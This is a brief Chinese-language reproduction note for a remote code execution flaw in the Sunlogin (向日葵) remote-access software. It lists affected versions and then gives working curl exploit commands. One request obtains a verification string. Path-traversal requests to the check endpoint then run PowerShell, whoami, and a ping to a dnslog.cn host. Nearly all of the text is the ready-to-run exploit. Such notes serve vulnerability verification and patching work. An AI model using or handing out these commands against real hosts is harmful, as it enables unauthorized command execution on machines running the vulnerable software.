向日葵RCE漏洞复现

参考链接

https://github.com/Mr-xn/sunlogin_rce/blob/main/rce/web.go

漏洞详情

影响版本： ver < 12.0.0.39380(发布时间2021年6月30日，即2021年6月30日之前安装的向日葵受漏洞影响)

复现步骤

# setp1: get verify_string
http://host/cgi-bin/rpc?action=verify-haras

# step2: RCE
curl 'http://host/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe%20calc' -H 'Cookie: CID=${verify_string}'


curl 'http://host/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2Fwhoami' -H 'Cookie: CID=${verify_string}'
curl 'http://host/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe%20ping%20xxx.dnslog.cn' -H 'Cookie: CID=${verify_string}'